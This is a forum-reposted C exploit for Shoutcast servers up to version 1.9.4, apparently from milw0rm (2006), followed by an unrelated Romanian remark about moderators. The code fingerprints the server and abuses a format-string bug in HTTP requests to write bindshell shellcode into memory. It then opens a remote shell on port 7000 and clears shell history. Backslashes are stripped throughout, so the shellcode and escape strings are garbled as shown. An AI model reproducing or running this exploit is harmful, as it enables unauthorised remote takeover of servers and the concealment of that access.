Code:
/*
* Shoutcast <= 1.9.4 exploit by crash-x
* Trys to upload the shellcode to a fixed address
* and execute it.
*
* This exploit was _not_ written bei Simon 'Zodiac' Moser (segfault.ch).
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <stdarg.h>
#include <signal.h>
#define SHELL_PORT 7000
#define SHELL_COMMAND "unset HISTFILE; uname -a; id;"
#if 1
unsigned char shellcode[] = /* bindshell (7000) (Unknown) */
"x31xc0x50x50x66xc7x44x24x02x1bx58xc6x04x24x02x89xe6"
"xb0x02xcdx80x85xc0x74x08x31xc0x31xdbxb0x01xcdx80x50"
"x6ax01x6ax02x89xe1x31xdbxb0x66xb3x01xcdx80x89xc5x6a"
"x10x56x50x89xe1xb0x66xb3x02xcdx80x6ax01x55x89xe1x31"
"xc0x31xdbxb0x66xb3x04xcdx80x31xc0x50x50x55x89xe1xb0"
"x66xb3x05xcdx80x89xc5x31xc0x89xebx31xc9xb0x3fxcdx80"
"x41x80xf9x03x7cxf6x31xc0x50x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80";
#endif
struct targ{
char *platform;
int retloc;
int retaddr;
int dpa_offset;
} targets[]= {
{ "Try to determine target", 0xdeadbabe, 0xdeadbabe, 123 },
{ "Shoutcast 1.9.4 all Linux distros", 0x0806493c, 0xdeadbabe, 2534 }, // dpa offset stolen from coki and tal0n's exploit
{ "Shoutcast 1.9.2 all Linux distros", 0x0806c270, 0xdeadbabe, 2536 },
{ NULL }
};
void usage(char *a){
int i;
printf("[-] Usage: %s -h <host> [options]n", a);
printf("[!] Options:n");
printf("tt-htHostname you want attack (required)n");
printf("tt-ptPort of the shoutcast (default: 8000)n");
printf("tt-ttTarget (default: 0)n");
printf("tt-stHow long to sleep before try connect to shell in s (default: 1)n");
printf("tt-StHow long to sleep before write the next byte of shellcode to the memory in ms (default: 7)n");
printf("[!] Targets:n");
for(i = 0; targets[i].platform; i++)
printf("tt%dt %sn", i, targets[i].platform);
exit(1);
}
int sockprintf(int sock, const char *s, ...){
char *ptr;
int bytes;
va_list arg;
va_start(arg, s);
if(vasprintf(&ptr, s, arg) == -1){
/* free(ptr); do'h shame on me */
return -1;
}
va_end(arg);
bytes = send(sock, ptr, strlen(ptr), 0);
free(ptr);
return bytes;
}
int resolv(struct sockaddr_in *addr, char *hostn){
struct hostent *host;
if (!inet_aton(hostn, &addr->sin_addr)){
host = gethostbyname(hostn);
if (host == NULL){
printf("[-] Wasnt able to resolve %s!n", hostn);
return -1;
}
addr->sin_addr = *(struct in_addr*)host->h_addr;
}
return 0;
}
int conn(struct sockaddr_in addr, int port){
int sock;
if((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1){
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
return -1;
}
return sock;
}
int get_shell(struct sockaddr_in addr, int port, int sleeps){
int sock;
char buffer[1024];
fd_set fds;
signal(SIGINT, SIG_IGN);
sleep(sleeps);
if((sock = conn(addr, port)) == -1)
return (-1);
printf("[+] Wooohooo we got a shell!n");
sockprintf(sock, SHELL_COMMAND"rn");
while(1){
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if (select(255, &fds, NULL, NULL, NULL) == -1){
fprintf(stderr,"[-] sending failedn");
close(sock);
exit(1);
}
memset(buffer, 0x0, sizeof(buffer));
if (FD_ISSET(sock, &fds)){
if (recv(sock, buffer, sizeof(buffer), 0) == -1){
fprintf(stderr, "[-] Connection closed by remote host!n");
close(sock);
exit(1);
}
fprintf(stderr, "%s", buffer);
}
if (FD_ISSET(0, &fds)){
read(0, buffer, sizeof(buffer));
write(sock, buffer, strlen(buffer));
}
}
return 0;
}
void status(int i, int retloc){
static int c=1;
switch(c){
case 1:
printf("[|] ");
break;
case 2:
printf("[/] ");
break;
case 3:
printf("[-] ");
break;
case 4:
printf("[\] ");
c = 0;
break;
}
printf("Uploading shellcode[%d] to [%p]r", i, (void *)retloc);
fflush(stdout);
c++;
}
int write_shellcode(struct sockaddr_in addr, int port, int target, int wsleeps){
char buffer[1024];
int retloc = ((0xc0000000) - 8 - strlen(shellcode)), i = 0, sock;
targets[target].retaddr = retloc;
for(i = 0; i < strlen(shellcode); i++, retloc++){
if((sock = conn(addr, port)) == -1)
return -1;
status(i, retloc);
*((void **)(buffer)) = (void *)((retloc));
buffer[4] = 0x0;
sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1rnrn", buffer);
close(sock);
if(shellcode[i] > 9)
snprintf(buffer, sizeof(buffer), "%%.%du%%%d$hn", shellcode[i], targets[target].dpa_offset);
else {
memset(buffer, 0x41, shellcode[i]);
snprintf(buffer + shellcode[i], sizeof(buffer), "%%%d$hn", targets[target].dpa_offset);
}
if((sock = conn(addr, port)) == -1)
return -1;
sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1rnrn", buffer);
close(sock);
// sleep(1);
usleep(wsleeps * 100000);
}
return 0;
}
int get_target(struct sockaddr_in addr, int port){
char buffer[1024], *ptr, *ptr2;
int sock, bytes;
if((sock = conn(addr, port)) == -1){
printf("failed!r[-]n");
return -2;
}
printf("done!n");
sockprintf(sock, "GET /doesntmatter HTTP/1.1rnrn");
if((bytes = recv(sock, buffer, sizeof(buffer)-1, 0)) == -1){
printf("[-] Wasnt able to determine version of server, do it yourself!n");
return -1;
}
buffer[bytes] = 0x0;
if(!(ptr = strstr(buffer, "<BR>"))){
printf("[-] Wasnt able to determine version of server, do it yourself!n");
return -1;
}
ptr += 4;
if(!(ptr2 = strstr(ptr, "<BR>"))){
printf("[-] Wasnt able to determine version of server, do it yourself!n");
return -1;
}
*ptr2 = 0x0;
printf("[!] Version: %sn", ptr);
if(strstr(ptr, "Server/Linux v1.9.4"))
return 1;
else if(strstr(ptr, "Server/Linux v1.9.2"))
return 2;
else if(strstr(ptr, "Server/FreeBSD")){
printf("[-] The server runs on FreeBSD, it could be FBSD 4.x or 5.x choose the target yourself!n");
return -1;
} else {
printf("[-] Wasnt able to find target for this server!n");
return -1;
}
return -1;
}
int main(int argc, char **argv){
char *hostn = NULL, buffer[1024];
int i, sock, opt, target = 0, port = 8000, shell_port = SHELL_PORT, sleeps = 1, wsleeps = 7;
unsigned short ret1, ret2;
struct sockaddr_in addr;
printf("[!] Shoutcast <= 1.9.4 exploit by crash-xn");
if (argc < 2)
usage(argv[0]);
while ((opt = getopt (argc, argv, "h:p:t:s:S:")) != -1){
switch (opt){
case 'h':
hostn = optarg;
break;
case 'p':
port = atoi(optarg);
if(port > 65535 || port < 1){
printf("[-] Port %d is invalidn",port);
return 1;
}
break;
case 't':
target = atoi(optarg);
for(i = 0; targets[i].platform; i++);
if(target >= i){
printf("[-] Wtf are you trying to target?n");
usage(argv[0]);
}
break;
case 's':
sleeps = atoi(optarg);
break;
case 'S':
wsleeps = atoi(optarg);
break;
default:
usage(argv[0]);
}
}
if(hostn == NULL)
usage(argv[0]);
resolv(&addr, hostn);
printf("[!] Connecting to target... ");
fflush(stdout);
if(target == 0){
if((target = get_target(addr, port)) < 0)
return target;
} else
if(get_target(addr, port) == -2)
exit(-2);
printf("[!] Targeting: %sn", targets[target].platform);
if(write_shellcode(addr, port, target, wsleeps) != -1)
printf("[+]n[+] Uploaded shellcode succesfuln");
else {
printf("[-]n[-] Wasn't able to upload shellcode, server probably crashed!n");
return -1;
}
printf("[!] Writing retaddr [%p] to retloc [%p]n", (void *)targets[target].retaddr, (void *)targets[target].retloc);
if((sock = conn(addr, port)) == -1){
printf("[-] Connecting failed!n");
return -1;
}
memset(buffer, 0x0, sizeof(buffer));
*((void **)(buffer)) = (void *)(targets[target].retloc);
*((void **)(buffer + 4)) = (void *)(targets[target].retloc + 2);
sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1rnrn", buffer);
close(sock);
ret1 = (targets[target].retaddr & 0xffff0000) >> 16;
ret2 = (targets[target].retaddr & 0x0000ffff);
snprintf(buffer, sizeof(buffer), "%%.%uu%%%d$hn%%.%uu%%%d$hn",
ret1, targets[target].dpa_offset + 1, (ret2 - ret1), targets[target].dpa_offset);
if((sock = conn(addr, port)) == -1){
printf("[-] Connecting failed!n");
return -1;
}
sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1rnrn", buffer);
if(get_shell(addr, shell_port, sleeps) == -1){
printf("[-] Exploit failedn");
return -1;
}
return 1;
}
// milw0rm.com [2006-01-28] |
ca si cum ar fi ceva atat de special sa fi moderator
